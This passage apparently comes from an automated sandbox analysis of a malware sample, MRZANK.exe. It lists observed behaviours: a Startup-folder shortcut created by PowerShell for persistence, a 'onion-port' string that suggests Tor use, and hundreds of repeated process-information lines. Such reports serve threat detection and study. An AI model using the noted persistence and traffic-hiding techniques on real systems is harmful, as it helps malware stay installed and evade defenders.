-band [System.IO.FileAttributes]::Offline){ return '({0})' -f $_.Length}return $_.Length{ if ($_.ProcessName -eq "core") { $hasCore = "Yes"} }$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upspur.lnkJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upspur.lnkJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
May use the Tor software to hide its network trafficShow sources
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpBinary or memory string: onion-port
Source: C:\Windows\System32\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
